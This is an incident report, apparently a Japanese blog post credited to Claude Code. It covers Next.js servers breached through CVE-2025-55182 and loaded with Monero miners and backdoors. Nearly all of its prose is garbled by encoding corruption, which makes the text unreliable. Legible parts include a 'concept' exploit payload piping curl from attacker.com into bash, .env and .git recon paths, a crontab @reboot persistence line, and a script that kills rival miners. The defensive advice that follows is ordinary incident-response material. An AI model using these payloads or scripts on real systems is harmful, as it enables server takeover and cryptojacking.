ใใฃใใๅไฝใ้
ใใชใจๆใฃใใใใใคใฎ้ใซใ CPU ไฝฟ็จ็ใ100%ใซใ
ใใใฏใใใ...ใจๆใฃใใใใพใใซใงใใใ
PM2ใซใญใฐใๆฎใฃใฆใใใฎใๆใใ
ๅพใฏใClaude Code ใซใใพใใใใพใใใ
ไปฅไธใๅๅฟ้ฒ๏ผ
ใฏใใใซ
2025ๅนด12ๆใ้็จใใฆใใ่คๆฐใฎNext.jsใขใใชใฑใผใทใงใณใใตใคใใผๆปๆใๅใใๆๅท้่ฒจใใคใใผใไป่พผใพใใพใใใCVE-2025-55182ใๅ ฌ้ใใใฆใใ2ๆฅๅพใฎใใจใงใใใ
Note: ใใฎ่จไบใฏใคใณใทใใณใ่ชฟๆปใฌใใผใใๅบใซใClaude Codeใๅท็ญใใพใใใ
TL;DR
- CVE-2025-55182ๅ ฌ้ใใ2ๆฅๅพใซๆปๆใๅใใ
- Next.js 15.x / 16.x ใฎServer Actions่ๅผฑๆงใงRCE๏ผใชใขใผใใณใผใๅฎ่ก๏ผใใใ
- ๆๅท้่ฒจใใคใใผ๏ผMonero๏ผใจ่คๆฐใฎใใใฏใใขใไป่พผใพใใ
- ใตใผใใผๅ ้จใฎ่ช่จผๆ ๅ ฑใๆผๆดฉใใๅฏ่ฝๆงใใใ
ใฟใคใ ใฉใคใณ
12/01 00:10 ๅตๅฏๆปๆ้ๅง๏ผ.git/config, .envในใญใฃใณ๏ผ
12/01 04:14 .envใใกใคใซๅๆๆปๆ๏ผ2,210ใชใฏใจในใ/2็ง๏ผ
12/03 CVE-2025-55182 ๅ
ฌ้
12/03-05 CVE-2025-55182ใๅฉ็จใใๆปๆๆๅ๏ผๆจๅฎ๏ผ
12/05 15:17 ใใซใฆใงใข#1 ใใฆใณใญใผใ
12/05 19:39 ใใซใฆใงใข#2 ใใฆใณใญใผใ
12/10 09:37 ใทในใใ ๅ่ตทๅๅพใใใใฏใใขใ่ชๅ่ตทๅ
12/10 10:22 Moneroใใคใใผ่ตทๅ๏ผCPUไฝฟ็จ็281%๏ผ
12/10 11:27 ็บ่ฆ
CVE-2025-55182ใซใคใใฆ
Next.jsใฎServer Actionsใซๅญๅจใใใใทใชใขใฉใคใผใผใทใงใณ่ๅผฑๆงใงใใ
ๅฝฑ้ฟใใผใธใงใณ
| ใใผใธใงใณ | ไฟฎๆญฃ็ |
|---|---|
| 15.3.0 - 15.3.5 | 15.3.6 |
| 15.4.0 - 15.4.7 | 15.4.8 |
| 15.5.0 - 15.5.6 | 15.5.7 |
| 16.0.0 - 16.0.6 | 16.0.7 |
่ๅผฑๆงใฎๅ็
Server Actionsใงๅใๅใใใฉใผใ ใใผใฟใฎใใผในๅฆ็ใงใReact่ฆ็ด ใฎๆค่จผใไธๅๅใงใใใ
// ๆปๆใใคใญใผใใฎๆฆๅฟต
const maliciousPayload = {
"$$typeof": "Symbol(react.element)",
"type": {
"$$typeof": "Symbol(react.module.reference)",
"name": "child_process",
"method": "exec"
},
"props": {
"cmd": "curl http://attacker.com/malware.sh | bash"
}
};
ใใใซใใไปปๆใฎใทใงใซใณใใณใใๅฎ่กๅฏ่ฝใซใชใใพใใ
ๆปๆใฎๆตใ
Phase 1: ๅตๅฏ๏ผ12/1๏ผ
CVEๅ ฌ้ใฎ2ๆฅๅใใๅตๅฏใๅงใพใฃใฆใใพใใใ
GET /.git/config โ Gitใชใใธใใชๆ
ๅ ฑๅ้
GET /.env โ ็ฐๅขๅคๆฐใใกใคใซๆข็ดข
GET /actuator/env โ Spring Boot่จญๅฎๆข็ดข
.envใใกใคใซใฎๅๆๆปๆใงใฏใ2็ง้ใง2,210็จฎ้กใฎใในใในใญใฃใณใใใพใใใ
/.env
/.env.local
/.env.production
/public/.env
/app/.env
/api/.env
...
Next.jsใฏ.envใ้็ใใกใคใซใจใใฆๅ
ฌ้ใใชใใใใใใฎๅตๅฏ่ชไฝใฏๅคฑๆใใฆใใพใใ
Phase 2: ไพตๅ ฅ๏ผ12/3-5๏ผ
CVE-2025-55182ใๅฉ็จใใฆRCEใ้ๆใPM2ใฎใจใฉใผใญใฐใซไปฅไธใฎ็่ทกใใใใพใใใ
โจฏ Error: Unexpected end of form
at ignore-listed frames { digest: '2025998549' }
ใใฎใจใฉใผใฏCVE-2025-55182ๆปๆๆใซ็บ็ใใใใฎใงใใ
Phase 3: ใใซใฆใงใขๅฑ้
ไปฅไธใฎใใซใฆใงใขใใใฆใณใญใผใใปๅฎ่กใใใพใใใ
| ใใกใคใซ | ใตใคใบ | ็จ้ |
|---|---|---|
/tmp/nginx3 |
10.4MB | ใใใฏใใข๏ผnginxๅฝ่ฃ ๏ผ |
/tmp/https |
34.2MB | ใใคใใผ or ใใใ |
~/.config/.system-monitor/.sys-mon |
14MB | ๆฐธ็ถๅใใใฏใใข |
/tmp/fghgf |
2.8MB | Moneroใใคใใผ |
watchdog |
8.6MB | XMRigใใคใใผ |
Phase 4: ๆฐธ็ถๅ
crontabใฎ@rebootใง่ชๅ่ตทๅใ่จญๅฎใใใฆใใพใใใ
@reboot nohup /home/user/.config/.system-monitor/.sys-mon > /dev/null 2>&1 &
ใใใฏใใขใฏ่คๆฐ็ฎๆใซใณใใผใใใฆใใพใใใ
~/.cache/dconf/.networkd-dispat
~/.local/share/systemd/.dbus-daemon
~/.local/share/gvfs-metadata/.accounts-daemon
ใใใใๆญฃ่ฆใฎใทในใใ ใใญใปในๅใซๅฝ่ฃ ใใฆใใพใใ
Phase 5: ็ซถๅๆ้ค
ไปใฎๆปๆ่ ใฎใใซใฆใงใขใๆ้คใใในใฏใชใใใ้ ็ฝฎใใใฆใใพใใใ
#!/bin/bash
while true; do
for proc_dir in /proc/[0-9]*; do
pid=${proc_dir##*/}
if strings "/proc/$pid/exe" 2>/dev/null | grep -Eq 'xmrig|rondo|UPX 5|futureoftaste'; then
kill -9 "$pid"
fi
done
sleep 45
done
45็งใใจใซไปใฎใใคใใผใๆคๅบใป็ตไบใใCPUใชใฝใผในใ็ฌๅ ใใไป็ตใฟใงใใ
็บ่ฆใฎ็ต็ทฏ
ใทในใใ ๅ่ตทๅๅพใใใกใณใฎ้ณใใใใใใฃใใฎใงhtopใ็ขบ่ชใใพใใใ
PID USER PRI NI VIRT RES SHR S CPU% MEM% TIME+ Command
17893 keppy 20 0 2.80G 268M 0 S 281.3 3.3 1h20:00 /tmp/fghgf
CPUไฝฟ็จ็281%ใฎใใญใปใน /tmp/fghgf ใMoneroใใคใใผใงใใใ
่ขซๅฎณ็ถๆณ
ใใซใฆใงใข
- ๅ่จ12ใใกใคใซใ็ด104.6MB
- ใในใฆๅ้คๆธใฟ
่ช่จผๆ ๅ ฑ
RCEใงใตใผใใผๅ ้จใซไพตๅ ฅใใใใใใใตใผใใผไธใฎ่ช่จผๆ ๅ ฑ๏ผSupabaseใญใผ็ญ๏ผใ่ชญใฟๅใใใๅฏ่ฝๆงใใใใพใใ่ช่จผๆ ๅ ฑใฏใในใฆใญใผใใผใทใงใณใใพใใใ
ๅฏพ็ญใจใใฆๆๅนใ ใฃใใจๆใใใใใฎ
1. ่ๅผฑๆงๆ ๅ ฑใฎๅณๆฅๅฏพๅฟ
CVEๅ ฌ้ใใ2ๆฅๆพ็ฝฎใใใใจใงๆปๆใๅใใพใใใ
npm install next@15.3.6 # CVEๅ
ฌ้ๅฝๆฅใซๅฎ่กใในใใ ใฃใ
2. WAFใฎๅฐๅ ฅ
CVE-2025-55182ใฎๆปๆใใฟใผใณใใใญใใฏใใWAFใซใผใซใใใใฐ้ฒใใๅฏ่ฝๆงใใใใพใใ
3. Rate Limiting
2็งใง2,210ใชใฏใจในใใจใใ็ฐๅธธใชใขใฏใปในใๆคๅบใปใใญใใฏใงใใพใใ
limit_req_zone $binary_remote_addr zone=general:10m rate=10r/s;
4. ใญใฐ็ฃ่ฆใฎ่ชๅๅ
PM2ใฎใจใฉใผใญใฐใซๆปๆใฎ็่ทกใๆฎใฃใฆใใพใใใ่ชๅ็ฃ่ฆใใฆใใใฐๆฉๆ็บ่ฆใงใใๅฏ่ฝๆงใใใใพใใ
# Prometheusใขใฉใผใไพ
- alert: CVEExploitAttempt
expr: rate(nextjs_errors{message=~".*Unexpected end of form.*"}[1m]) > 0
labels:
severity: critical
ๆปๆ่ ใฎๅ็๏ผๅ่๏ผ
Moneroใใคใใผใฎๆจๅฎๅ็:
- ใใใทใฅใฌใผใ: ็ด2,810 H/s
- ๆฅๆฌกๅ็: $0.00073
- ๆๆฌกๅ็: $0.022
1ๅฐใงใฏๅ็ใซใชใใพใใใใๅคง้ใฎใตใผใใผใซๆๆใใใใใจใงๅ็ๅใใใใธใในใขใใซใงใใ
ๅฏพๅฟๆใฎใใงใใฏใชในใ
ๅๆงใฎ่ขซๅฎณใซ้ญใฃใๅ ดๅใฎๅ่:
ใพใๅฎๆฝ
-
ไธๅฏฉใชใใญใปในใ
kill -9 -
/tmp้ ไธใฎไธๅฏฉใชใใกใคใซใๅ้ค -
crontab -lใงๆฐธ็ถๅใ็ขบ่ชใปๅ้ค -
~/.config,~/.cache,~/.local้ ไธใฎไธๅฏฉใใกใคใซใๅ้ค - PM2็ญใฎใใญใปในๅ จๅๆญข
ใใฎๅพ
- ใในใฆใฎ่ช่จผๆ ๅ ฑใใญใผใใผใทใงใณ
- ใใฌใผใ ใฏใผใฏใๆๆฐ็ใซใขใใใใผใ
- SSH้ตใฎ็ขบ่ช๏ผไธๅฏฉใชๅ ฌ้้ตใใชใใ๏ผ
- ใใผใฟใใผในใฎไธๆญฃใขใฏใปในใญใฐ็ขบ่ช
- WAFๅฐๅ ฅ
- Rate Limiting่จญๅฎ
- Fail2Banๅฐๅ ฅ
- ใญใฐ็ฃ่ฆ่ชๅๅ
ใพใจใ
CVEๅ ฌ้ใใๆปๆใๅใใใพใง2ๆฅใงใใใ่ๅผฑๆงๆ ๅ ฑใ็ขบ่ชใใใๆฉใใซๅฏพๅฟใใใใจใใๅงใใใพใใ
ๅ่ใชใณใฏ
ๅ ่ฒฌไบ้ : ใใฎ่จไบใฏๅฎ้ใฎใคใณใทใใณใใๅบใซใใฆใใพใใใไธ้จๆ ๅ ฑใฏๅคๆดใใฆใใพใใ
ๅท็ญ: Claude Code
Comments
Let's comment your feelings that are more than good